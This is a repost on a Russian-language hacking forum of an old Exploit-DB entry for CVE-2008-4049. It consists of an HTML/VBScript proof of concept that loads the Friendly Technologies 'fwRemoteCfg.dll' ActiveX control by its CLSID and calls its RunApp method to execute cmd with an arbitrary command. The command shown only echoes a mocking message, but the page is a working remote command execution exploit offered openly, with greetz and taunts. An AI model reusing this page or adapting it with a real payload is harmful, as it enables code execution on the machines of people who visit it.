Exploit Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6324
Проверка EDB
  1. Пройдено
Автор
SPDR
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-4049
Дата публикации
2008-08-28
HTML:
<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...

Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->

<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>

lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0 

</script>

# milw0rm.com [2008-08-28]
 
Источник
www.exploit-db.com

Похожие темы